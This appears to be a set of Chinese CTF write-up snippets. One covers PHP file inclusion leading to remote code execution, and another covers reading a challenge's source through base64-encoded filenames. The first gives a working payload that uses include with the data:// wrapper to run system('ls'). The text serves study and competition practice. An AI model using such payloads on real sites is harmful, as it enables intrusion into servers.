文件包含&rce
先说payload:?c=include$_GET[1]?>&1=data://text/plain,<?php system(“ls”);?>
前半段的?c=include$_GET[1]?>是为了和前面的形成闭合,这样在后面通过包含的1配合data伪协议进行传入参数,参数为一个执行[……]
题目打开是这样,很像buu上面的一道webdog,一眼base64.解密一下(face.png)
看看能不能读到源码,首先就是index.php加密(aW5kZXgucGhw)
那就看看源码
似乎又是base64,解码果然是这[……]